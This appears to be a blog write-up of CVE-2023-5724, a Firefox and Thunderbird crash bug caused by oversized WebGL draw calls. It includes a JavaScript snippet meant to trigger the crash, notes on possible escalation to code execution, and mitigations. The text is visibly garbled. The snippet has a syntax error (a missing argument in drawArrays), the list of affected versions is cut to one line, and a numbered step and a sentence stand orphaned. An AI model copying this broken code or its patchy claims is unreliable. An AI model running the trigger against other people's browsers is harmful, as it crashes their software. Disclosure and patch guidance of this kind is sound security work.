CVE-2023-5724 - Exploiting Large Draw Call Vulnerabilities in Firefox and Thunderbird

On October 24, 2023, a notable vulnerability was disclosed in Mozilla Firefox, Firefox ESR, and Thunderbird, tracked as CVE-2023-5724. In simple terms, this bug allows attackers to crash your browser — sometimes even leading to security compromise — by issuing extremely large graphical draw calls. Let’s break down what’s going on, why it matters, and how you might test for or exploit this issue if you’re a security researcher.

What Are Draw Calls, and Why Do They Matter?

A “draw call” in graphics programming means telling the graphics driver to draw something — like a shape or a web page element. Modern websites can ask your computer to do a lot of drawing very quickly, especially using Canvas or WebGL in Firefox and Thunderbird’s rendering engine.

Most drivers (the software that controls your hardware) expect reasonable numbers for draw call size. But sometimes, if you ask to draw something absurdly large, the browser or the hardware driver may not be able to handle it gracefully, leading to memory corruption or a crash.

Thunderbird less than 115.4.1

> Note: If your software is up-to-date, you are not vulnerable.

The Simple Problem: Drivers are Not Always Robust

The issue is simple: The graphics processing drivers that Mozilla relies on weren’t properly handling the edge case of “extremely large” draw calls. Instead of safely failing or rejecting the request, they could crash — possibly in ways that attackers could exploit.

From Mozilla’s own advisory:
> *"Drivers are not always robust to extremely large draw calls, and in some cases this scenario could have led to a crash."*

Code Snippet: Triggering the Vulnerability

You don’t need a super-complex exploit for this one. If you want to see how this could be triggered, here’s some sample JavaScript for use in a Firefox browser (do not use this on machines with valuable data):

// Attempt to allocate a massive WebGL buffer and draw
const canvas = document.createElement("canvas");
canvas.width = 10000;
canvas.height = 10000;
document.body.appendChild(canvas);

const gl = canvas.getContext("webgl");
if (gl) {
    const buffer = gl.createBuffer();
    gl.bindBuffer(gl.ARRAY_BUFFER, buffer);
    // Try to allocate a huge buffer, may trigger driver crash
    try {
        gl.bufferData(gl.ARRAY_BUFFER, new Float32Array(2 ** 27), gl.STATIC_DRAW);
        gl.drawArrays(gl.TRIANGLES, , 2 ** 26);
    } catch(e) {
        alert("Exception: " + e);
    }
}

Depending on your driver and machine, this may crash the browser. In older versions, this sometimes resulted in corrupted memory or a full application crash.

Exploit Details

While “just crashing” a browser doesn’t sound too bad, malformed draw calls crashing the driver surface can sometimes be escalated:

- Remote code execution: If memory gets corrupted in a clever way, an attacker could run arbitrary code.

Security sandbox escape: Sometimes, bugs like these can let processes escape visual sandboxing.

> *Note: As of public disclosure, no known RCE exploits exist in the wild for this specific bug, but history teaches us to patch these quickly!*

The graphics driver (if unpatched) fails to handle the request, causing the process to crash.

4. With enough research, a skilled attacker could potentially craft a payload for code execution instead of just a crash.

Testing for the Vulnerability

A simple test is to load the above code snippet on an unpatched version of Firefox (pre-119) or Thunderbird (pre-115.4.1, with HTML email rendering enabled). If the browser freezes, crashes, or behaves unpredictably, you’re vulnerable!

Official References & Further Reading

- NIST NVD: CVE-2023-5724
- Mozilla Security Advisory MFSA2023-44
- Mozilla Bugzilla ID 1851467

Update Firefox, Firefox ESR, and Thunderbird to the latest versions.

- Disable WebGL if you don’t need it. You can do this in Firefox about:config by setting webgl.disabled = true.

Conclusion

CVE-2023-5724 demonstrates how even simple mistakes — like not checking numbers for graphical draw calls — can give attackers an entry point. Make sure your browsers and mail apps are updated, and stay safe browsing out there!


*If this article was helpful, let us know in the comments. Stay tuned for more exclusive deep-dives on browser security!*

Timeline

Published on: 10/25/2023 18:17:44 UTC
Last modified on: 11/02/2023 20:17:36 UTC